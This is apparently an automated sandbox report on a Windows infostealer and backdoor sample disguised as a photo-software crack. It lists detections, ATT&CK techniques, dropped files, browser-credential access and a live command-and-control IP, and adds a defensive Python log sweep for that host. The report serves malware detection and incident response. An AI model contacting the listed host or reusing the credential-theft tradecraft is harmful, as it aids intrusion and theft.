Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00458E58 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe | Code function: 21_2_00404654 GetModuleHandleA,GetVersion,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDEPPolicy,

Stealing of Sensitive Information

Source: Yara match | File source: 0.3.KbqArOlW06.exe.16636690.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.KbqArOlW06.exe.16726700.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.KbqArOlW06.exe.18de6818.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.KbqArOlW06.exe.179e67e0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.KbqArOlW06.exe.166866c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.KbqArOlW06.exe.16866738.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.KbqArOlW06.exe.16ae6770.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.KbqArOlW06.exe.16fe67a8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.2.0.0-beta2.cps.exe.9a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.KbqArOlW06.exe.18de6818.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.0.2.0.0-beta2.cps.exe.9a0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.0.2.0.0-beta2.cps.exe.9a0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.0.2.0.0-beta2.cps.exe.9a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.KbqArOlW06.exe.16636690.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.KbqArOlW06.exe.16726700.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.KbqArOlW06.exe.16866738.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.KbqArOlW06.exe.16ae6770.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.KbqArOlW06.exe.179e67e0.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.KbqArOlW06.exe.166866c8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.0.2.0.0-beta2.cps.exe.9a0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.KbqArOlW06.exe.16fe67a8.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.264598811.000000001DAA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.249916384.0000000018DE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.491962653.0000000001250000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.271980164.0000000026172000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.491186607.000000000124A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.474319850.0000000001251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.275645439.0000000036F02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.235992777.00000000166BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.507099567.000000000122A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.469967022.0000000001253000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.236293949.000000001675D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.235782523.000000001666D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.492733952.000000000124A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.477408811.0000000001251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.244960789.00000000179E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.465053520.0000000001259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.236963971.000000001689D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.285645229.000000004EF02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.235724819.000000001662F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.237949559.0000000016B1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: Yara match | File source: Process Memory Space: 2.0.0-beta2.cps.exe PID: 2332, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 0.3.KbqArOlW06.exe.16636690.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.KbqArOlW06.exe.16726700.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.KbqArOlW06.exe.18de6818.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.KbqArOlW06.exe.179e67e0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.KbqArOlW06.exe.166866c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.KbqArOlW06.exe.16866738.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.KbqArOlW06.exe.16ae6770.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.KbqArOlW06.exe.16fe67a8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.2.0.0-beta2.cps.exe.9a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.KbqArOlW06.exe.18de6818.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.0.2.0.0-beta2.cps.exe.9a0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.0.2.0.0-beta2.cps.exe.9a0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.0.2.0.0-beta2.cps.exe.9a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.KbqArOlW06.exe.16636690.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.KbqArOlW06.exe.16726700.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.KbqArOlW06.exe.16866738.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.KbqArOlW06.exe.16ae6770.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.KbqArOlW06.exe.179e67e0.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.KbqArOlW06.exe.166866c8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.0.2.0.0-beta2.cps.exe.9a0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.KbqArOlW06.exe.16fe67a8.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.264598811.000000001DAA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.249916384.0000000018DE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.491962653.0000000001250000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.271980164.0000000026172000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.491186607.000000000124A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.474319850.0000000001251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.275645439.0000000036F02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.235992777.00000000166BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.507099567.000000000122A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.469967022.0000000001253000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.236293949.000000001675D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.235782523.000000001666D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.492733952.000000000124A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.477408811.0000000001251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.244960789.00000000179E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.465053520.0000000001259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.236963971.000000001689D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.285645229.000000004EF02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.235724819.000000001662F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.237949559.0000000016B1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK matrix, listed per tactic column (a number in front of a technique is the count badge the report shows next to it):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 2 Native API; 12 Command and Scripting Interpreter; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Access Token Manipulation; 12 Process Injection; Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
Defense Evasion: 1 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 11 Software Packing; 1 Masquerading; 241 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 12 Process Injection; Masquerading; Invalid Code Signature
Credential Access: 1 OS Credential Dumping; 1 Credential API Hooking; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 1 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 237 System Information Discovery; 1 Query Registry; 421 Security Software Discovery; 11 Process Discovery; 241 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 3 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Credential API Hooking; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
Command and Control: 11 Ingress Tool Transfer; 1 Encrypted Channel; 2 Non-Application Layer Protocol; 112 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: 1 System Shutdown/Reboot; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact
Behavior Graph ID: 679264, Sample: KbqArOlW06.exe, Startdate: 05/08/2022, Architecture: WINDOWS, Score: 60
Signatures on the sample: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Antivirus / Scanner detection for submitted sample; 5 other signatures
Process KbqArOlW06.exe (started)
  dropped: A1Photo-&-Art-Enha...atch_Activation.exe (PE32); C:\Users\user\AppData\...\2.0.0-beta2.cps.exe (PE32); C:\Users\user\AppData\...\KbqArOlW06.exe.log (ASCII)
  child process 2.0.0-beta2.cps.exe (started)
    network: 51.195.166.178, source port 49778, destination port 80, OVHFR France
    dropped: C:\Users\user\AppData\...\vcruntime140.dll (PE32); C:\Users\user\AppData\LocalLow\sqlite3.dll (PE32); C:\Users\user\AppData\LocalLow\softokn3.dll (PE32); 4 other files (none is malicious)
    signatures: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Query firmware table information (likely to detect VMs); Tries to harvest and steal browser information (history, passwords, etc); 3 other signatures
  child process A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe (started)
    dropped: A1Photo-&-Art-Enha...atch_Activation.tmp (PE32)
    signatures: Obfuscated command line found
    child process A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp (started)
      dropped: C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+)

Source | Detection | Scanner | Label
KbqArOlW06.exe | 27% | Virustotal |
KbqArOlW06.exe | 29% | Metadefender |
KbqArOlW06.exe | 69% | ReversingLabs | ByteCode-MSIL.Backdoor.Crysan
KbqArOlW06.exe | 100% | Avira | HEUR/AGEN.1231971
Source | Detection | Scanner | Label
C:\Users\user\AppData\LocalLow\freebl3.dll | 0% | Virustotal |
C:\Users\user\AppData\LocalLow\freebl3.dll | 0% | Metadefender |
C:\Users\user\AppData\LocalLow\freebl3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\LocalLow\mozglue.dll | 0% | Virustotal |
C:\Users\user\AppData\LocalLow\mozglue.dll | 0% | Metadefender |
C:\Users\user\AppData\LocalLow\mozglue.dll | 0% | ReversingLabs |
C:\Users\user\AppData\LocalLow\msvcp140.dll | 0% | Virustotal |
C:\Users\user\AppData\LocalLow\msvcp140.dll | 0% | Metadefender |
C:\Users\user\AppData\LocalLow\msvcp140.dll | 0% | ReversingLabs |
C:\Users\user\AppData\LocalLow\nss3.dll | 0% | Virustotal |
C:\Users\user\AppData\LocalLow\nss3.dll | 0% | Metadefender |
C:\Users\user\AppData\LocalLow\nss3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\LocalLow\softokn3.dll | 0% | Virustotal |
C:\Users\user\AppData\LocalLow\softokn3.dll | 0% | Metadefender |
C:\Users\user\AppData\LocalLow\softokn3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\LocalLow\sqlite3.dll | 0% | Metadefender |
C:\Users\user\AppData\LocalLow\sqlite3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\LocalLow\vcruntime140.dll | 0% | Metadefender |
C:\Users\user\AppData\LocalLow\vcruntime140.dll | 0% | ReversingLabs |
Source | Detection | Scanner | Label
16.2.2.0.0-beta2.cps.exe.9a0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.3.KbqArOlW06.exe.18de6818.7.unpack | 100% | Avira | TR/Patched.Ren.Gen
21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2
21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2
21.2.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2
16.0.2.0.0-beta2.cps.exe.9a0000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2
22.2.A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp.400000.0.unpack | 100% | Avira | HEUR/AGEN.1248792
16.0.2.0.0-beta2.cps.exe.9a0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
16.0.2.0.0-beta2.cps.exe.9a0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.3.KbqArOlW06.exe.16726700.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.3.KbqArOlW06.exe.16636690.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.3.KbqArOlW06.exe.16866738.3.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.3.KbqArOlW06.exe.179e67e0.6.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.3.KbqArOlW06.exe.16ae6770.4.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.3.KbqArOlW06.exe.166866c8.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2
16.0.2.0.0-beta2.cps.exe.9a0000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.3.KbqArOlW06.exe.16fe67a8.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
No Antivirus matches
Source | Detection | Scanner | Label
http://www.innosetup.com/ | 0% | URL Reputation | safe
http://www.palkornel.hu/innosetup | 0% | Virustotal |
http://www.palkornel.hu/innosetup | 0% | Avira URL Cloud | safe
http://www.remobjects.com/psU | 0% | URL Reputation | safe
http://51.195.166.178/ | 8% | Virustotal |
http://51.195.166.178/ | 0% | Avira URL Cloud | safe
http://www.palkornel.hu/innosetup%1 | 0% | URL Reputation | safe
http://www.remobjects.com/ps | 0% | URL Reputation | safe
https://mozilla.org0 | 0% | URL Reputation | safe
http://51.195.166.178/b6425a6ca38e36b1a195f6f3019a4b0a | 0% | Avira URL Cloud | safe
                      No contacted domains info
                      NameMaliciousAntivirus DetectionReputation
                      http://51.195.166.178/true
                      • 8%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://51.195.166.178/b6425a6ca38e36b1a195f6f3019a4b0atrue
                      • Avira URL Cloud: safe
                      unknown
URLs found in memory and binary data (Name, Source, Malicious, Antivirus Detection, Reputation):

Name: http://www.innosetup.com/
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://www.mediachance.com/2
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://www.mozilla.com/en-US/blocklist/
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.511072689.000000006D833000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.16.dr
Malicious: false
Reputation: high

Name: http://www.palkornel.hu/innosetup
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.461402961.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503593390.0000000002257000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.470482188.000000000225C000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.469376595.00000000031B0000.00000004.00001000.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Virustotal: 0% (Browse); Avira URL Cloud: safe
Reputation: unknown

Name: http://www.remobjects.com/psU
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.463131309.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.464570142.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000000.459336953.0000000000401000.00000020.00000001.01000000.00000009.sdmp
Malicious: false
Reputation: high

Name: https://www.mediachance.com/
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.461402961.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503593390.0000000002257000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503570926.0000000002250000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.470482188.000000000225C000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.469376595.00000000031B0000.00000004.00001000.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://www.mediachance.com/.
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503593390.0000000002257000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.470482188.000000000225C000.00000004.00001000.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000000.459336953.0000000000401000.00000020.00000001.01000000.00000009.sdmp
Malicious: false
Reputation: high

Name: http://www.palkornel.hu/innosetup%1
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.461402961.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503593390.0000000002257000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.470482188.000000000225C000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.469376595.00000000031B0000.00000004.00001000.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: http://www.remobjects.com/ps
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.463131309.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.464570142.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://www.mediachance.com/&
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503570926.0000000002250000.00000004.00001000.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://mozilla.org0
Source: freebl3.dll.16.dr, mozglue.dll.16.dr
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: http://www.sqlite.org/copyright.html.
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510333215.0000000061ED1000.00000008.00000001.01000000.0000000E.sdmp
Malicious: false
Reputation: high
IP | Domain | Country | ASN | ASN Name | Malicious
51.195.166.178 | unknown | France | 16276 | OVHFR | true
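The two contacted URLs and the single contacted IP above are the network IOCs this report yields: host 51.195.166.178 (AS16276, OVH), reached at its root and at a resource path made of 32 lowercase hex characters. The following is an added example, not part of the Joe Sandbox report, showing how an analyst would sweep proxy logs for contact with that host. The squid-like log layout and the four sample lines are constructed for the example (their timestamps fall on the report's analysis date but are not real traffic), and the split into "root", "hex32" and "other path" verdicts is this example's own triage scheme, not something the report defines.

```python
"""Sweep proxy log lines for contact with the C2 host listed in this report.
Added example, not part of the Joe Sandbox report; the log lines are constructed."""
import re
from collections import Counter
from urllib.parse import urlsplit

# IOCs from the report's contacted-IP and contacted-URL tables.
C2_HOSTS = {"51.195.166.178"}
# The second contacted URL is the host root plus a 32-character lowercase hex path.
HEX32_PATH = re.compile(r"^/[0-9a-f]{32}$")

# Constructed sample lines in a squid-like "<epoch> <client> <method> <url> <status>"
# layout; these are not lines from the analysis, only test input for this example.
SAMPLE_LOG = """\
1659700281.101 10.0.0.12 GET http://51.195.166.178/ 200
1659700282.417 10.0.0.12 POST http://51.195.166.178/b6425a6ca38e36b1a195f6f3019a4b0a 200
1659700290.003 10.0.0.15 GET https://www.mozilla.org/en-US/ 200
1659700295.550 10.0.0.15 GET http://51.195.166.178/favicon.ico 404
"""


def classify(url: str):
    """Verdict for one URL: 'c2-root', 'c2-hex32', 'c2-host', or None if not a C2 host.
    The host is the strong indicator; the 32-hex path only ranks hits on a known host,
    because that path shape is common on benign CDNs as well and must not be used alone."""
    parts = urlsplit(url)
    if parts.hostname not in C2_HOSTS:
        return None
    if parts.path in ("", "/"):
        return "c2-root"
    if HEX32_PATH.match(parts.path):
        return "c2-hex32"
    return "c2-host"


def scan_log(text: str) -> list:
    """Return (epoch, client, method, url, verdict) for every line touching a C2 host."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue  # malformed or truncated line: skip rather than guess
        epoch, client, method, url = fields[:4]
        verdict = classify(url)
        if verdict is not None:
            hits.append((float(epoch), client, method, url, verdict))
    return hits


def clients_to_isolate(hits) -> list:
    """Distinct internal clients that reached a C2 host, sorted, for containment."""
    return sorted({h[1] for h in hits})


def verdict_counts(hits) -> Counter:
    """How many hits of each verdict, e.g. to see whether check-ins (hex32) occurred."""
    return Counter(h[4] for h in hits)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for hit in found:
        print(hit)
    print("isolate:", clients_to_isolate(found), dict(verdict_counts(found)))
```

Run against real logs, the only field that needs adapting is the column order in scan_log; the verdict logic stays the same. A "c2-host" hit on an unrelated path (the favicon line) still means the client resolved and reached the C2 address and should be included in containment, which is why it is not filtered out.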
                                      Joe Sandbox Version:35.0.0 Citrine
                                      Analysis ID:679264
Start date and time: 2022-08-05 13:51:21 +02:00
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 10m 41s
                                      Hypervisor based Inspection enabled:false
                                      Report type:light
                                      Sample file name:KbqArOlW06.exe
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 24
